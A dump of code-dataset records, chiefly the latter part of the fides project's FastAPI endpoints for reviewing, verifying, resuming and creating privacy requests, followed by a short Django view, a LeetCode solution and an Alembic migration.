queue_privacy_request(\n privacy_request_id=privacy_request.id,\n from_step=paused_step.value,\n )\n\n return privacy_request\n\n\n@router.post(\n PRIVACY_REQUEST_MANUAL_INPUT,\n status_code=HTTP_200_OK,\n response_model=PrivacyRequestResponse,\n dependencies=[\n Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_CALLBACK_RESUME])\n ],\n)\ndef resume_with_manual_input(\n privacy_request_id: str,\n *,\n db: Session = Depends(deps.get_db),\n manual_rows: List[Row],\n) -> PrivacyRequestResponse:\n \"\"\"Resume a privacy request by passing in manual input for the paused collection.\n\n If there's no manual data to submit, pass in an empty list to resume the privacy request.\n \"\"\"\n return resume_privacy_request_with_manual_input(\n privacy_request_id=privacy_request_id,\n db=db,\n expected_paused_step=CurrentStep.access,\n manual_rows=manual_rows,\n ) # type: ignore[return-value]\n\n\n@router.post(\n PRIVACY_REQUEST_MANUAL_ERASURE,\n status_code=HTTP_200_OK,\n response_model=PrivacyRequestResponse,\n dependencies=[\n Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_CALLBACK_RESUME])\n ],\n)\ndef resume_with_erasure_confirmation(\n privacy_request_id: str,\n *,\n db: Session = Depends(deps.get_db),\n cache: FidesopsRedis = Depends(deps.get_cache),\n manual_count: RowCountRequest,\n) -> PrivacyRequestResponse:\n \"\"\"Resume the erasure portion of privacy request by passing in the number of rows that were manually masked.\n\n If no rows were masked, pass in a 0 to resume the privacy request.\n \"\"\"\n return resume_privacy_request_with_manual_input(\n privacy_request_id=privacy_request_id,\n db=db,\n expected_paused_step=CurrentStep.erasure,\n manual_count=manual_count.row_count,\n ) # type: ignore[return-value]\n\n\n@router.post(\n PRIVACY_REQUEST_BULK_RETRY,\n status_code=HTTP_200_OK,\n response_model=BulkPostPrivacyRequests,\n dependencies=[\n Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_CALLBACK_RESUME])\n ],\n)\ndef bulk_restart_privacy_request_from_failure(\n privacy_request_ids: List[str],\n *,\n db: Session = Depends(deps.get_db),\n) -> BulkPostPrivacyRequests:\n \"\"\"Bulk restart a of privacy request from failure.\"\"\"\n succeeded: List[PrivacyRequestResponse] = []\n failed: List[Dict[str, Any]] = []\n for privacy_request_id in privacy_request_ids:\n privacy_request = PrivacyRequest.get(db, object_id=privacy_request_id)\n\n if not privacy_request:\n failed.append(\n {\n \"message\": f\"No privacy request found with id '{privacy_request_id}'\",\n \"data\": {\"privacy_request_id\": privacy_request_id},\n }\n )\n continue\n\n if privacy_request.status != PrivacyRequestStatus.error:\n failed.append(\n {\n \"message\": f\"Cannot restart privacy request from failure: privacy request '{privacy_request.id}' status = {privacy_request.status.value}.\",\n \"data\": {\"privacy_request_id\": privacy_request_id},\n }\n )\n continue\n\n failed_details: Optional[\n CheckpointActionRequired\n ] = privacy_request.get_failed_checkpoint_details()\n\n succeeded.append(\n _process_privacy_request_restart(\n privacy_request,\n failed_details.step if failed_details else None,\n failed_details.collection if failed_details else None,\n db,\n )\n )\n\n return BulkPostPrivacyRequests(succeeded=succeeded, failed=failed)\n\n\n@router.post(\n PRIVACY_REQUEST_RETRY,\n status_code=HTTP_200_OK,\n response_model=PrivacyRequestResponse,\n dependencies=[\n Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_CALLBACK_RESUME])\n ],\n)\ndef restart_privacy_request_from_failure(\n privacy_request_id: str,\n *,\n db: Session = Depends(deps.get_db),\n) -> PrivacyRequestResponse:\n \"\"\"Restart a privacy request from failure\"\"\"\n privacy_request: PrivacyRequest = get_privacy_request_or_error(\n db, privacy_request_id\n )\n\n if privacy_request.status != PrivacyRequestStatus.error:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Cannot restart privacy request from failure: privacy request '{privacy_request.id}' status = {privacy_request.status.value}.\", # type: ignore\n )\n\n failed_details: Optional[\n CheckpointActionRequired\n ] = privacy_request.get_failed_checkpoint_details()\n\n return _process_privacy_request_restart(\n privacy_request,\n failed_details.step if failed_details else None,\n failed_details.collection if failed_details else None,\n db,\n )\n\n\ndef review_privacy_request(\n db: Session,\n request_ids: List[str],\n process_request_function: Callable,\n) -> BulkReviewResponse:\n \"\"\"Helper method shared between the approve and deny privacy request endpoints\"\"\"\n succeeded: List[PrivacyRequest] = []\n failed: List[Dict[str, Any]] = []\n\n for request_id in request_ids:\n privacy_request = PrivacyRequest.get(db, object_id=request_id)\n if not privacy_request:\n failed.append(\n {\n \"message\": f\"No privacy request found with id '{request_id}'\",\n \"data\": {\"privacy_request_id\": request_id},\n }\n )\n continue\n\n if privacy_request.status != PrivacyRequestStatus.pending:\n failed.append(\n {\n \"message\": \"Cannot transition status\",\n \"data\": PrivacyRequestResponse.from_orm(privacy_request),\n }\n )\n continue\n\n try:\n process_request_function(privacy_request)\n except Exception:\n failure = {\n \"message\": \"Privacy request could not be updated\",\n \"data\": PrivacyRequestResponse.from_orm(privacy_request),\n }\n failed.append(failure)\n else:\n succeeded.append(privacy_request)\n\n return BulkReviewResponse(\n succeeded=succeeded,\n failed=failed,\n )\n\n\ndef _send_privacy_request_review_message_to_user(\n action_type: MessagingActionType,\n identity_data: Dict[str, Any],\n rejection_reason: Optional[str],\n service_type: Optional[str],\n) -> None:\n \"\"\"Helper method to send review notification message to user, shared between approve and deny\"\"\"\n if not identity_data:\n logger.error(\n IdentityNotFoundException(\n \"Identity was not found, so request review message could not be sent.\"\n )\n )\n to_identity: Identity = Identity(\n email=identity_data.get(ProvidedIdentityType.email.value),\n phone_number=identity_data.get(ProvidedIdentityType.phone_number.value),\n )\n dispatch_message_task.apply_async(\n queue=MESSAGING_QUEUE_NAME,\n kwargs={\n \"message_meta\": FidesopsMessage(\n action_type=action_type,\n body_params=RequestReviewDenyBodyParams(\n rejection_reason=rejection_reason\n )\n if action_type is MessagingActionType.PRIVACY_REQUEST_REVIEW_DENY\n else None,\n ).dict(),\n \"service_type\": service_type,\n \"to_identity\": to_identity.dict(),\n },\n )\n\n\n@router.post(\n PRIVACY_REQUEST_VERIFY_IDENTITY,\n status_code=HTTP_200_OK,\n response_model=PrivacyRequestResponse,\n)\ndef verify_identification_code(\n privacy_request_id: str,\n *,\n db: Session = Depends(deps.get_db),\n config_proxy: ConfigProxy = Depends(deps.get_config_proxy),\n provided_code: VerificationCode,\n) -> PrivacyRequestResponse:\n \"\"\"Verify the supplied identity verification code.\n\n If successful, and we don't need separate manual request approval, queue the privacy request\n for execution.\n \"\"\"\n\n privacy_request: PrivacyRequest = get_privacy_request_or_error(\n db, privacy_request_id\n )\n try:\n privacy_request.verify_identity(db, provided_code.code)\n policy: Optional[Policy] = Policy.get(\n db=db, object_id=privacy_request.policy_id\n )\n if config_proxy.notifications.send_request_receipt_notification:\n _send_privacy_request_receipt_message_to_user(\n policy,\n privacy_request.get_persisted_identity(),\n config_proxy.notifications.notification_service_type,\n )\n except IdentityVerificationException as exc:\n raise HTTPException(status_code=HTTP_400_BAD_REQUEST, detail=exc.message)\n except PermissionError as exc:\n logger.info(\"Invalid verification code provided for {}.\", privacy_request.id)\n raise HTTPException(status_code=HTTP_403_FORBIDDEN, detail=exc.args[0])\n\n logger.info(\"Identity verified for {}.\", privacy_request.id)\n\n if not config_proxy.execution.require_manual_request_approval:\n AuditLog.create(\n db=db,\n data={\n \"user_id\": \"system\",\n \"privacy_request_id\": privacy_request.id,\n \"action\": AuditLogAction.approved,\n \"message\": \"\",\n },\n )\n queue_privacy_request(privacy_request.id)\n\n return privacy_request # type: ignore[return-value]\n\n\n@router.patch(\n PRIVACY_REQUEST_APPROVE,\n status_code=HTTP_200_OK,\n response_model=BulkReviewResponse,\n)\ndef approve_privacy_request(\n *,\n db: Session = Depends(deps.get_db),\n config_proxy: ConfigProxy = Depends(deps.get_config_proxy),\n client: ClientDetail = Security(\n verify_oauth_client,\n scopes=[PRIVACY_REQUEST_REVIEW],\n ),\n privacy_requests: ReviewPrivacyRequestIds,\n) -> BulkReviewResponse:\n \"\"\"Approve and dispatch a list of privacy requests and/or report failure\"\"\"\n user_id = client.user_id\n\n def _approve_request(privacy_request: PrivacyRequest) -> None:\n \"\"\"Method for how to process requests - approved\"\"\"\n now = datetime.utcnow()\n privacy_request.status = PrivacyRequestStatus.approved\n privacy_request.reviewed_at = now\n privacy_request.reviewed_by = user_id\n # for now, the reviewer will be marked as the approver of the custom privacy request fields\n # this is to make it flexible in the future if we want to allow a different user to approve\n if privacy_request.custom_fields: # type: ignore[attr-defined]\n privacy_request.custom_privacy_request_fields_approved_at = now\n privacy_request.custom_privacy_request_fields_approved_by = user_id\n privacy_request.save(db=db)\n AuditLog.create(\n db=db,\n data={\n \"user_id\": user_id,\n \"privacy_request_id\": privacy_request.id,\n \"action\": AuditLogAction.approved,\n \"message\": \"\",\n },\n )\n if config_proxy.notifications.send_request_review_notification:\n _send_privacy_request_review_message_to_user(\n action_type=MessagingActionType.PRIVACY_REQUEST_REVIEW_APPROVE,\n identity_data=privacy_request.get_cached_identity_data(),\n rejection_reason=None,\n service_type=config_proxy.notifications.notification_service_type,\n )\n\n queue_privacy_request(privacy_request_id=privacy_request.id)\n\n return review_privacy_request(\n db=db,\n request_ids=privacy_requests.request_ids,\n process_request_function=_approve_request,\n )\n\n\n@router.patch(\n PRIVACY_REQUEST_DENY,\n status_code=HTTP_200_OK,\n response_model=BulkReviewResponse,\n)\ndef deny_privacy_request(\n *,\n db: Session = Depends(deps.get_db),\n config_proxy: ConfigProxy = Depends(deps.get_config_proxy),\n client: ClientDetail = Security(\n verify_oauth_client,\n scopes=[PRIVACY_REQUEST_REVIEW],\n ),\n privacy_requests: DenyPrivacyRequests,\n) -> BulkReviewResponse:\n \"\"\"Deny a list of privacy requests and/or report failure\"\"\"\n user_id = client.user_id\n\n def _deny_request(\n privacy_request: PrivacyRequest,\n ) -> None:\n \"\"\"Method for how to process requests - denied\"\"\"\n privacy_request.status = PrivacyRequestStatus.denied\n privacy_request.reviewed_at = datetime.utcnow()\n privacy_request.reviewed_by = user_id\n privacy_request.save(db=db)\n AuditLog.create(\n db=db,\n data={\n \"user_id\": user_id,\n \"privacy_request_id\": privacy_request.id,\n \"action\": AuditLogAction.denied,\n \"message\": privacy_requests.reason,\n },\n )\n if config_proxy.notifications.send_request_review_notification:\n _send_privacy_request_review_message_to_user(\n action_type=MessagingActionType.PRIVACY_REQUEST_REVIEW_DENY,\n identity_data=privacy_request.get_cached_identity_data(),\n rejection_reason=privacy_requests.reason,\n service_type=config_proxy.notifications.notification_service_type,\n )\n\n return review_privacy_request(\n db=db,\n request_ids=privacy_requests.request_ids,\n process_request_function=_deny_request,\n )\n\n\ndef _handle_manual_webhook_input(\n action: Literal[\"access\", \"erasure\"],\n connection_config: ConnectionConfig,\n privacy_request_id: str,\n db: Session,\n input_data: Dict[str, Any],\n) -> None:\n privacy_request: PrivacyRequest = get_privacy_request_or_error(\n db, privacy_request_id\n )\n access_manual_webhook: AccessManualWebhook = get_access_manual_webhook_or_404(\n connection_config\n )\n\n if not privacy_request.status == PrivacyRequestStatus.requires_input:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Invalid manual webhook {action} upload request: privacy request '{privacy_request.id}' status = {privacy_request.status.value}.\", # type: ignore\n )\n\n try:\n getattr(privacy_request, f\"cache_manual_webhook_{action}_input\")(\n access_manual_webhook, input_data\n )\n except PydanticValidationError as exc:\n raise HTTPException(\n status_code=HTTP_422_UNPROCESSABLE_ENTITY, detail=exc.errors()\n )\n\n logger.info(\n \"{} input saved for manual webhook '{}' for privacy_request '{}'.\",\n action.capitalize(),\n access_manual_webhook,\n privacy_request,\n )\n\n\n@router.patch(\n PRIVACY_REQUEST_MANUAL_WEBHOOK_ACCESS_INPUT,\n status_code=HTTP_200_OK,\n dependencies=[Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_UPLOAD_DATA])],\n response_model=None,\n)\ndef upload_manual_webhook_access_data(\n *,\n connection_config: ConnectionConfig = Depends(_get_connection_config),\n privacy_request_id: str,\n db: Session = Depends(deps.get_db),\n input_data: Dict[str, Any],\n) -> None:\n \"\"\"Upload manual access input for the privacy request for the fields defined on the access manual webhook.\n The data collected here is not included in the graph but uploaded directly to the user at the end\n of privacy request execution.\n\n Because a 'manual_webhook' ConnectionConfig has one AccessManualWebhook associated with it,\n we are using the ConnectionConfig key as the AccessManualWebhook identifier here.\n \"\"\"\n _handle_manual_webhook_input(\n action=\"access\",\n connection_config=connection_config,\n privacy_request_id=privacy_request_id,\n db=db,\n input_data=input_data,\n )\n\n\n@router.patch(\n PRIVACY_REQUEST_MANUAL_WEBHOOK_ERASURE_INPUT,\n status_code=HTTP_200_OK,\n dependencies=[Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_UPLOAD_DATA])],\n response_model=None,\n)\ndef upload_manual_webhook_erasure_data(\n *,\n connection_config: ConnectionConfig = Depends(_get_connection_config),\n privacy_request_id: str,\n db: Session = Depends(deps.get_db),\n input_data: Dict[str, Any],\n) -> None:\n \"\"\"Upload manual erasure input for the privacy request for the fields defined on the access manual webhook.\n\n Because a 'manual_webhook' ConnectionConfig has one AccessManualWebhook associated with it,\n we are using the ConnectionConfig key as the AccessManualWebhook identifier here.\n \"\"\"\n _handle_manual_webhook_input(\n action=\"erasure\",\n connection_config=connection_config,\n privacy_request_id=privacy_request_id,\n db=db,\n input_data=input_data,\n )\n\n\n@router.get(\n PRIVACY_REQUEST_TRANSFER_TO_PARENT,\n status_code=HTTP_200_OK,\n dependencies=[Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_TRANSFER])],\n response_model=Dict[str, Optional[List[Row]]],\n)\ndef privacy_request_data_transfer(\n *,\n privacy_request_id: str,\n rule_key: str,\n db: Session = Depends(deps.get_db),\n cache: FidesopsRedis = Depends(deps.get_cache),\n) -> Dict[str, Optional[List[Row]]]:\n \"\"\"Transfer access request iinformation to the parent server.\"\"\"\n privacy_request = PrivacyRequest.get(db=db, object_id=privacy_request_id)\n\n if not privacy_request:\n raise HTTPException(\n status_code=HTTP_404_NOT_FOUND,\n detail=f\"No privacy request with id {privacy_request_id} found\",\n )\n\n rule = Rule.filter(db=db, conditions=(Rule.key == rule_key)).first()\n if not rule:\n raise HTTPException(\n status_code=HTTP_404_NOT_FOUND,\n detail=f\"Rule key {rule_key} not found\",\n )\n\n value_dict: Dict[str, Optional[List[Row]]] = cache.get_encoded_objects_by_prefix(\n f\"{privacy_request_id}__access_request\"\n )\n\n if not value_dict:\n raise HTTPException(\n status_code=HTTP_404_NOT_FOUND,\n detail=f\"No access request information found for privacy request id {privacy_request_id}\",\n )\n\n access_result = {k.split(\"__\")[-1]: v for k, v in value_dict.items()}\n datasets = DatasetConfig.all(db=db)\n if not datasets:\n raise HTTPException(\n status_code=HTTP_404_NOT_FOUND,\n detail=f\"No datasets found for privacy request {privacy_request_id}\",\n )\n\n dataset_graphs = [dataset_config.get_graph() for dataset_config in datasets]\n if not dataset_graphs:\n raise HTTPException(\n status_code=HTTP_404_NOT_FOUND,\n detail=f\"No dataset graphs found for privacy request {privacy_request_id}\",\n )\n dataset_graph = DatasetGraph(*dataset_graphs)\n target_categories = {target.data_category for target in rule.targets}\n filtered_results: Optional[Dict[str, Optional[List[Row]]]] = filter_data_categories(\n access_result, # type: ignore\n target_categories,\n dataset_graph.data_category_field_mapping,\n )\n\n if filtered_results is None:\n raise HTTPException(\n status_code=404,\n detail=f\"No results found for privacy request {privacy_request_id}\",\n )\n\n return filtered_results\n\n\n@router.get(\n PRIVACY_REQUEST_MANUAL_WEBHOOK_ACCESS_INPUT,\n status_code=HTTP_200_OK,\n dependencies=[Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_VIEW_DATA])],\n response_model=Optional[ManualWebhookData],\n)\ndef view_uploaded_manual_webhook_data(\n *,\n connection_config: ConnectionConfig = Depends(_get_connection_config),\n privacy_request_id: str,\n db: Session = Depends(deps.get_db),\n) -> Optional[ManualWebhookData]:\n \"\"\"\n View uploaded data for this privacy request for the given access manual webhook\n\n If no data exists for this webhook, we just return all fields as None.\n If we have missing or extra fields saved, we'll just return the overlap between what is saved and what is defined on the webhook.\n\n If checked=False, data must be reviewed before submission. The privacy request should not be submitted as-is.\n \"\"\"\n privacy_request: PrivacyRequest = get_privacy_request_or_error(\n db, privacy_request_id\n )\n access_manual_webhook: AccessManualWebhook = get_access_manual_webhook_or_404(\n connection_config\n )\n\n if not privacy_request.status == PrivacyRequestStatus.requires_input:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Invalid manual webhook access upload request: privacy request \"\n f\"'{privacy_request.id}' status = {privacy_request.status.value}.\", # type: ignore\n )\n\n try:\n logger.info(\n \"Retrieving input data for access manual webhook '{}' for privacy request '{}'.\",\n connection_config.key,\n privacy_request.id,\n )\n data: Dict[str, Any] = privacy_request.get_manual_webhook_access_input_strict(\n access_manual_webhook\n )\n checked = True\n except (\n PydanticValidationError,\n ManualWebhookFieldsUnset,\n NoCachedManualWebhookEntry,\n ) as exc:\n logger.info(exc)\n data = privacy_request.get_manual_webhook_access_input_non_strict(\n manual_webhook=access_manual_webhook\n )\n checked = False\n\n return ManualWebhookData(checked=checked, fields=data)\n\n\n@router.get(\n PRIVACY_REQUEST_MANUAL_WEBHOOK_ERASURE_INPUT,\n status_code=HTTP_200_OK,\n dependencies=[Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_VIEW_DATA])],\n response_model=Optional[ManualWebhookData],\n)\ndef view_uploaded_erasure_manual_webhook_data(\n *,\n connection_config: ConnectionConfig = Depends(_get_connection_config),\n privacy_request_id: str,\n db: Session = Depends(deps.get_db),\n) -> Optional[ManualWebhookData]:\n \"\"\"\n View uploaded erasure data for this privacy request for the given manual webhook\n\n If no data exists for this webhook, we just return all fields as None.\n If we have missing or extra fields saved, we'll just return the overlap between what is saved and what is defined on the webhook.\n\n If checked=False, data must be reviewed before submission. The privacy request should not be submitted as-is.\n \"\"\"\n privacy_request: PrivacyRequest = get_privacy_request_or_error(\n db, privacy_request_id\n )\n manual_webhook: AccessManualWebhook = get_access_manual_webhook_or_404(\n connection_config\n )\n\n if not privacy_request.status == PrivacyRequestStatus.requires_input:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Invalid manual webhook erasure upload request: privacy request \"\n f\"'{privacy_request.id}' status = {privacy_request.status.value}.\", # type: ignore\n )\n\n try:\n logger.info(\n \"Retrieving erasure input data for manual webhook '{}' for privacy request '{}'.\",\n connection_config.key,\n privacy_request.id,\n )\n data: Dict[str, Any] = privacy_request.get_manual_webhook_erasure_input_strict(\n manual_webhook\n )\n checked = True\n except (\n PydanticValidationError,\n ManualWebhookFieldsUnset,\n NoCachedManualWebhookEntry,\n ) as exc:\n logger.info(exc)\n data = privacy_request.get_manual_webhook_erasure_input_non_strict(\n manual_webhook=manual_webhook\n )\n checked = False\n\n return ManualWebhookData(checked=checked, fields=data)\n\n\n@router.post(\n PRIVACY_REQUEST_RESUME_FROM_REQUIRES_INPUT,\n status_code=HTTP_200_OK,\n response_model=PrivacyRequestResponse,\n dependencies=[\n Security(verify_oauth_client, scopes=[PRIVACY_REQUEST_CALLBACK_RESUME])\n ],\n)\ndef resume_privacy_request_from_requires_input(\n privacy_request_id: str,\n *,\n db: Session = Depends(deps.get_db),\n) -> PrivacyRequestResponse:\n \"\"\"Resume a privacy request from 'requires_input' status.\"\"\"\n privacy_request: PrivacyRequest = get_privacy_request_or_error(\n db, privacy_request_id\n )\n\n if privacy_request.status != PrivacyRequestStatus.requires_input:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Cannot resume privacy request from 'requires_input': privacy request '{privacy_request.id}' status = {privacy_request.status.value}.\", # type: ignore\n )\n\n access_manual_webhooks: List[AccessManualWebhook] = AccessManualWebhook.get_enabled(\n db\n )\n try:\n for manual_webhook in access_manual_webhooks:\n # check the access or erasure cache based on the privacy request's action type\n if privacy_request.policy.get_rules_for_action(\n action_type=ActionType.access\n ):\n privacy_request.get_manual_webhook_access_input_strict(manual_webhook)\n if privacy_request.policy.get_rules_for_action(\n action_type=ActionType.erasure\n ):\n privacy_request.get_manual_webhook_erasure_input_strict(manual_webhook)\n except (\n NoCachedManualWebhookEntry,\n PydanticValidationError,\n ManualWebhookFieldsUnset,\n ) as exc:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail=f\"Cannot resume privacy request. {exc}\",\n )\n\n logger.info(\n \"Resuming privacy request '{}' after manual inputs verified\",\n privacy_request_id,\n )\n\n privacy_request.status = PrivacyRequestStatus.in_processing\n privacy_request.save(db=db)\n queue_privacy_request(\n privacy_request_id=privacy_request.id,\n )\n\n return privacy_request # type: ignore[return-value]\n\n\ndef create_privacy_request_func(\n db: Session,\n config_proxy: ConfigProxy,\n data: conlist(PrivacyRequestCreate), # type: ignore\n authenticated: bool = False,\n privacy_preferences: List[\n PrivacyPreferenceHistory\n ] = [], # For consent requests only\n) -> BulkPostPrivacyRequests:\n \"\"\"Creates privacy requests.\n\n If authenticated is True the identity verification step is bypassed.\n \"\"\"\n if not CONFIG.redis.enabled:\n raise FunctionalityNotConfigured(\n \"Application redis cache required, but it is currently disabled! Please update your application configuration to enable integration with a redis cache.\"\n )\n\n created = []\n failed = []\n # Optional fields to validate here are those that are both nullable in the DB, and exist\n # on the Pydantic schema\n\n logger.info(\"Starting creation for {} privacy requests\", len(data))\n\n optional_fields = [\n \"external_id\",\n \"started_processing_at\",\n \"finished_processing_at\",\n \"consent_preferences\",\n ]\n for privacy_request_data in data:\n if not any(privacy_request_data.identity.dict().values()):\n logger.warning(\n \"Create failed for privacy request with no identity provided\"\n )\n failure = {\n \"message\": \"You must provide at least one identity to process\",\n \"data\": privacy_request_data,\n }\n failed.append(failure)\n continue\n\n logger.info(\"Finding policy with key '{}'\", privacy_request_data.policy_key)\n policy: Optional[Policy] = Policy.get_by(\n db=db,\n field=\"key\",\n value=privacy_request_data.policy_key,\n )\n if policy is None:\n logger.warning(\n \"Create failed for privacy request with invalid policy key {}'\",\n privacy_request_data.policy_key,\n )\n\n failure = {\n \"message\": f\"Policy with key {privacy_request_data.policy_key} does not exist\",\n \"data\": privacy_request_data,\n }\n failed.append(failure)\n continue\n\n kwargs = build_required_privacy_request_kwargs(\n privacy_request_data.requested_at,\n policy.id,\n config_proxy.execution.subject_identity_verification_required,\n authenticated,\n )\n for field in optional_fields:\n attr = getattr(privacy_request_data, field)\n if attr is not None:\n if field == \"consent_preferences\":\n attr = [consent.dict() for consent in attr]\n\n kwargs[field] = attr\n\n try:\n privacy_request: PrivacyRequest = PrivacyRequest.create(db=db, data=kwargs)\n privacy_request.persist_identity(\n db=db, identity=privacy_request_data.identity\n )\n privacy_request.persist_custom_privacy_request_fields(\n db=db,\n custom_privacy_request_fields=privacy_request_data.custom_privacy_request_fields,\n )\n for privacy_preference in privacy_preferences:\n privacy_preference.privacy_request_id = privacy_request.id\n privacy_preference.save(db=db)\n\n cache_data(\n privacy_request,\n policy,\n privacy_request_data.identity,\n privacy_request_data.encryption_key,\n None,\n privacy_request_data.custom_privacy_request_fields,\n )\n\n check_and_dispatch_error_notifications(db=db)\n\n if (\n not authenticated\n and config_proxy.execution.subject_identity_verification_required\n ):\n send_verification_code_to_user(\n db, privacy_request, privacy_request_data.identity\n )\n created.append(privacy_request)\n continue # Skip further processing for this privacy request\n if (\n not authenticated\n and config_proxy.notifications.send_request_receipt_notification\n ):\n _send_privacy_request_receipt_message_to_user(\n policy,\n privacy_request_data.identity,\n config_proxy.notifications.notification_service_type,\n )\n if not config_proxy.execution.require_manual_request_approval:\n AuditLog.create(\n db=db,\n data={\n \"user_id\": \"system\",\n \"privacy_request_id\": privacy_request.id,\n \"action\": AuditLogAction.approved,\n \"message\": \"\",\n },\n )\n queue_privacy_request(privacy_request.id)\n except MessageDispatchException as exc:\n kwargs[\"privacy_request_id\"] = privacy_request.id\n logger.error(\"MessageDispatchException: {}\", exc)\n failure = {\n \"message\": \"Verification message could not be sent.\",\n \"data\": kwargs,\n }\n failed.append(failure)\n except common_exceptions.RedisConnectionError as exc:\n logger.error(\"RedisConnectionError: {}\", Pii(str(exc)))\n # Thrown when cache.ping() fails on cache connection retrieval\n raise HTTPException(\n status_code=HTTP_424_FAILED_DEPENDENCY,\n detail=exc.args[0],\n )\n except Exception as exc:\n as_string = Pii(str(exc))\n error_cls = str(exc.__class__.__name__)\n logger.error(f\"Exception {error_cls}: {as_string}\")\n failure = {\n \"message\": \"This record could not be added\",\n \"data\": kwargs,\n }\n failed.append(failure)\n else:\n created.append(privacy_request)\n\n # TODO: Don't return a 200 if there are failed requests, or at least not\n # if there are zero successful ones\n return BulkPostPrivacyRequests(\n succeeded=created,\n failed=failed,\n )\n\n\ndef _process_privacy_request_restart(\n privacy_request: PrivacyRequest,\n failed_step: Optional[CurrentStep],\n failed_collection: Optional[CollectionAddress],\n db: Session,\n) -> PrivacyRequestResponse:\n \"\"\"If failed_step and failed_collection are provided, restart the DSR within that step. Otherwise,\n restart the privacy request from the beginning.\"\"\"\n if failed_step and failed_collection:\n logger.info(\n \"Restarting failed privacy request '{}' from '{} step, 'collection '{}'\",\n privacy_request.id,\n failed_step,\n failed_collection,\n )\n else:\n logger.info(\n \"Restarting failed privacy request '{}' from the beginning\",\n privacy_request.id,\n )\n\n privacy_request.status = PrivacyRequestStatus.in_processing\n privacy_request.save(db=db)\n queue_privacy_request(\n privacy_request_id=privacy_request.id,\n from_step=failed_step.value if failed_step else None,\n )\n\n return privacy_request # type: ignore[return-value]\n","repo_name":"ethyca/fides","sub_path":"src/fides/api/api/v1/endpoints/privacy_request_endpoints.py","file_name":"privacy_request_endpoints.py","file_ext":"py","file_size_in_byte":68025,"program_lang":"python","lang":"en","doc_type":"code","stars":302,"dataset":"github-code","pt":"76"} +{"seq_id":"27175113639","text":"from django.core.paginator import Paginator\nfrom django.shortcuts import get_object_or_404, redirect, render\n\nfrom caim_base.views.awg.user_permissions import (\n check_awg_user_permissions_update_context,\n)\n\nfrom ...animal_search import query_animals\nfrom ...models.animals import AnimalShortList\nfrom ...models.awg import Awg\n\n\ndef view(request, awg_id):\n awg = get_object_or_404(Awg, pk=awg_id)\n\n # If not published AND current user is not a staff member, redirect\n if (\n not awg.status == \"PUBLISHED\"\n and not awg.user_is_member_of_awg(request.user)\n and not request.user.is_staff\n ):\n return redirect(\"/\")\n\n current_page = request.GET.get(\"page\", 1)\n npp = 21\n\n query = query_animals(request.user, awg_id=awg.id)\n\n all_animals = query.all()\n paginator = Paginator(all_animals, npp)\n animals = paginator.page(current_page)\n\n if request.user.is_authenticated:\n shortlists = AnimalShortList.objects.filter(user=request.user.id)\n shortlist_animal_ids = [s.animal_id for s in shortlists]\n else:\n shortlist_animal_ids = []\n\n context = {\n \"awg\": awg,\n \"pageTitle\": f\"{awg.name}\",\n \"animals\": animals,\n \"paginator\": paginator,\n \"shortlistAnimalIds\": shortlist_animal_ids,\n }\n context = check_awg_user_permissions_update_context(request, awg, None, context)\n\n return render(request, \"awg/view.html\", context)\n","repo_name":"caim-org/caim-app","sub_path":"caim_base/views/awg/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"73411960885","text":"class Solution(object):\n def nextGreaterElement(self, findNums, nums):\n \"\"\"\n :type findNums: List[int]\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n d = {}\n stack = []\n for num in nums:\n while stack and num > stack[len(stack)-1]:\n d[stack.pop()] = num\n stack.append(num)\n\n\n res = []\n for i in range(len(findNums)):\n if findNums[i] in d:\n res.append(d[findNums[i]])\n else:\n res.append(-1)\n return res\n","repo_name":"franktank/py-practice","sub_path":"bloomberg/next-greater-element.py","file_name":"next-greater-element.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"33651869748","text":"\"\"\"empty message\n\nRevision ID: 5be2e56dfbe4\nRevises: b9ca3bb89757\nCreate Date: 2018-10-28 00:36:38.068738\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '5be2e56dfbe4'\ndown_revision = 'b9ca3bb89757'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('BIGdog',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('a_name', sa.String(length=16), nullable=True),\n sa.Column('d_leg', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.drop_table('dog')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('dog',\n sa.Column('id', mysql.INTEGER(display_width=11), autoincrement=True, nullable=False),\n sa.Column('a_name', mysql.VARCHAR(length=16), nullable=True),\n sa.Column('d_leg', mysql.INTEGER(display_width=11), autoincrement=False, nullable=True),\n sa.PrimaryKeyConstraint('id'),\n mysql_default_charset='utf8',\n mysql_engine='InnoDB'\n )\n op.drop_table('BIGdog')\n # ### end Alembic commands ###\n","repo_name":"845788173/copy","sub_path":"python1809/flask/flask04/migrations/versions/5be2e56dfbe4_.py","file_name":"5be2e56dfbe4_.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25668745925","text":"import inspect, glob, os, datetime\n\nfrom ...utils.api import route, Parameter\n\nfrom ...libs import logs_lib, flask_lib, secure_lib\n\nfrom ...models.main 